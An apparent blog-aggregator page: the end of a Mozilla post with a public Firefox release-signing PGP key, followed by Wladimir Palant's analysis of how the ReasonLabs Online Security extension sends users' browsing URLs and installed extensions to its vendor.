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
fxyRMB5BEeLY0+qVPyvOxpXEGnlSHYmdIS4=
=ZEQW
-----END PGP PUBLIC KEY BLOCK-----

The post Updated GPG key for signing Firefox Releases appeared first on Mozilla Security Blog.

Wladimir PalantOnline Security extension: Destroying privacy for no good reason

These days it’s typical for antivirus vendors to provide you with a browser extension which is meant to improve your online security. I’ll say up front: I don’t consider any such browser extensions recommendable. At best, they are worthless. At worst, they introduce massive security issues.

As an example I took a brief look at the Online Security extension by ReasonLabs. No, there is no actual reason beyond its 7 million users. I think that this extension is a fairly typical representative of its craft.

A pop-up titled “Online Security for Google Chrome” and subtitled “Protects your browsing and personal information by blocking harmful content and real-time detection of data breaches.” A big orange button below says “Scan now.”

TL;DR: Most Online Security functionality is already provided by the browser, and there is little indication that it can improve on that. It does implement its functionality in a maximally privacy-unfriendly way however, sharing your browsing history and installed extensions with the vendor. There is also plenty of sloppy programming, some of which might potentially cause issues.

Features

First I want to take the Online Security features apart one by one. It might come as no surprise, but there is less here than the extension’s description makes it sound like.

URL blocking

The extension description claims:

URL Blocker - Online Security protects you against security breaches that come from browsing suspicious websites. Malware, phishing attempts, crypto-jackers, and scams that can damage both your browser and your device - we track them to keep you and your personal data safe.

If that sounds good, it’s probably because the browser’s built-in protection does such a good job staying in the background. Few people are even aware that it exists. So they will believe antivirus vendors’ claims that they need a third-party product to keep them safe from malicious websites.

Now I cannot really tell how detection quality of Online Security compares to Google Safe Browsing that most browsers rely on. I can comment on the implementation however. While the built-in protection will block malicious websites both at the top level and as frames, Online Security only looks at top-level addresses.

The much bigger issue however is: unlike the browser, Online Security lacks the data to make a decision locally. Instead, it will query ReasonLab’s web server for each and every address you navigate to. The query part of the address will be omitted, in case that makes you feel better.

Here is what a typical request looks like:

POST /SSE/v1/scan/urls.ashx HTTP/1.1
Host: apis.reasonsecurity.com
Cookie: s_id=5c1030de-48ae-4edd-acc3-5d92f4735f96; ruser=3b2653d9-31b9-4ce8-9127-efa0cda53702; aft=…
x-userid: 2362740a-6bba-40d6-8047-898a3b4423d5
Content-Length: 33
Content-Type: application/json

["https://www.google.com/search"]

That’s three user identifiers: two sent as cookies and a third one as x-userid HTTP header. While the former will be reset when the browsing data is cleared, the latter is stored in the extension and will persist for as long as the extension is installed. We’ll see that unique user identifier again.

This request will be sent whenever a new page loads. There is no caching: the extension won’t recognize that it queried the server about the exact same page seconds ago but rather send a new request.

That’s not quite as invasive as what we’ve seen with Avast’s data collection where the context of the page load was being collected as well. Well, at least usually it isn’t. When Online Security performs a scan, be it manual or automated, it will send the addresses of all your tabs to the server:

POST /SSE/v1/scan/urls.ashx HTTP/1.1
Host: apis.reasonsecurity.com
Cookie: s_id=5c1030de-48ae-4edd-acc3-5d92f4735f96; ruser=3b2653d9-31b9-4ce8-9127-efa0cda53702; aft=…
x-userid: 2362740a-6bba-40d6-8047-898a3b4423d5
Content-Length: 335
Content-Type: application/json

[
  "https://example.com/",
  "chrome://extensions/",
  "https://chrome.google.com/webstore/detail/online-security/llbcnfanfmjhpedaedhbcnpgeepdnnok/related",
  "https://www.test.de/Geld-anlegen-mit-Zinsen-4209104-0/",
  "chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/index.html",
  "chrome-extension://llbcnfanfmjhpedaedhbcnpgeepdnnok/index.html"
]

Yes, that even includes duplicate addresses. Still, likely no malice is involved here. Yet 17 years after Firefox 2 introduced privacy preserving phishing protection we shouldn’t have to discuss this again.

Protection against malicious websites in modern browsers will typically use local data to check website addresses against. The server will only be queried if there is a match, just in case the data changed in the meantime. And this should really be the baseline privacy level for any security solution today.

What happens to the data?

It’s impossible to tell from the outside what ReasonLab’s servers do with this data. So we have to rely on the information provided in the privacy policy:

We will also collect URLs and the preceding referral domains to check if they are malicious.

Good, they mention collecting this data in unambiguous terms.

In this regard, we will send the URLs to our servers but only store their domains in order to operate and provide the Software services.

So they don’t claim the data to be deleted. They won’t keep the full addresses but they will keep the domain names. This statement leaves some open questions.

Most importantly, the privacy policy doesn’t mention the user identifier at all. If it’s stored along with the domain names, it still allows conclusions about the browsing habits of an individual user. There is also a non-negligible deanonymization potential here.

Also, what kind of services need this data? It’s hard to imagine anything that wouldn’t involve user profiles for advertising.

Extension blocking

Next feature:

Disables Harmful Extensions - Online Security identifies all extensions installed on your browser and disables the harmful ones that may hijack your browser settings.

Yet another piece of functionality that is already built into the browser. However, once again the built-in functionality is so unintrusive that antivirus vendors see a chance to sell you the same functionality.

I’m unsure about the implementation details for Chrome, but Firefox has a local blocklist-addons.json file that it checks all browser extensions against. In case of a match the extension is disabled.

Online Security on the other hand opted for a less privacy-friendly approach: when scanning, it will send the complete list of your installed extensions to the ReasonLab’s server:

POST /SSE/v1/scan/extensions.ashx HTTP/1.1
Host: api.reasonsecurity.com
Cookie: s_id=5c1030de-48ae-4edd-acc3-5d92f4735f96; ruser=3b2653d9-31b9-4ce8-9127-efa0cda53702; aft=…
Content-Length: 141
Content-Type: application/json

[
  "kpcjmfjmknbolfjjemmbpnajbiehajac",
  "badikkiifpoiichdfhclfkmpeiagfnpa",
  "nkdpapfpjjgbfpnombidpiokcmfkfdgn",
  "oboonakemofpalcgghocfoadofidjkkk"
]

The privacy policy acknowledges collecting this data but doesn’t tell what happens to it. At least the x-userid header isn’t present, so it’s only cookies identifying the user.

Well, maybe they at least do a better job at blocking malicious extensions than the browser does? After all, Google has been repeatedly criticized for not recognizing malicious extensions in Chrome Web Store.

Yes, but Google will remove and block malicious extensions when notified about them. So the only way of performing better than the built-in functionality is scanning for malicious extensions and keeping quiet about it, thus putting users at risk.

Searching data leaks

Let’s move on to something the browser won’t do:

Dark Web Monitoring - lets you know when your email-related information has become exposed. It will reveal details like passwords, usernames, financial information, and other sensitive details while providing steps to remediate the issue.

This sounds really fancy. What it actually means however: the extension can check whether your email address is present in any known data leaks. It will also use this feature as leverage: you have to register to run the check regularly, and you have to buy the premium version in order to scan multiple email addresses.

It so happens that the well-known website Have I Been Pwned provides the same service for free and without requiring you to register. Again, maybe they aren’t as good? Hard to tell.

But at least when I enter me@mailinator.com into Have I Been Pwned the result cites 99 data breaches and 7 pastes. Doing the same in Online Security yields merely 2 data breaches, which seems to suggest a rather bad data basis.

Interestingly, SpyCloud (which Online Security privacy policy cites as a partner) claims “659 breach exposures” for me@mailinator.com. It won’t tell any details unless you pay them however.

Download monitoring

Now you probably expect that an antivirus vendor will focus on your downloads. And Online Security has you covered:

Monitors Downloads - Online Security seamlessly integrates with RAV Endpoint Protection providing a full and comprehensive protection across your web browser and personal computer.

In other words: you have to install their antivirus, and then the extension will trigger it whenever you download something.

Which, quite frankly, isn’t very impressive. The IAttachmentExecute::Save method has been available as a way to run antivirus applications since Windows XP SP2. Mozilla added support for it with Firefox 3, which was released 15 years ago. Chrome likely supported this from day one. So antivirus software has had a supported way to scan downloads for a very long time. It doesn’t need browser extensions for that.

Cookie and tracker blocking, notification control

And then there are a few more things that pretend to be useful features:

Blocks Cookies and Trackers- Online Security identifies and blocks malicious cookies and trackers that target you with aggressive and hostile advertising. This allows you to keep your browsing experience private and safe.

Notification Control - Online Security blocks notifications from malicious websites and puts the control at your fingertips, so you can easily follow and remove unwanted notifications through the extension dashboard.

Don’t make the wording here confuse you: Online Security is not an ad blocker. It won’t actually block trackers, and it won’t really help you get rid of cookies or notifications.

This entire block of functionality is reserved exclusively to websites that Online Security considers malicious. When it encounters a malicious website (which, in its definition, is restricted to top-level websites), Online Security will delete cookies and browsing data for this website. It will also disable notifications from it.

Now you are probably wondering: what’s the point if malicious websites are blocked anyway? But they aren’t actually blocked. Since Online Security doesn’t have its data available locally, it has to query its webserver to decide whether a website is malicious. By the time it receives a response, the website might have loaded already. So it will be redirected to the extension’s “Blocked website” page.

So this functionality is merely a band-aid for the window of opportunity this extension grants malicious websites to do mischief.

Explicit tracking

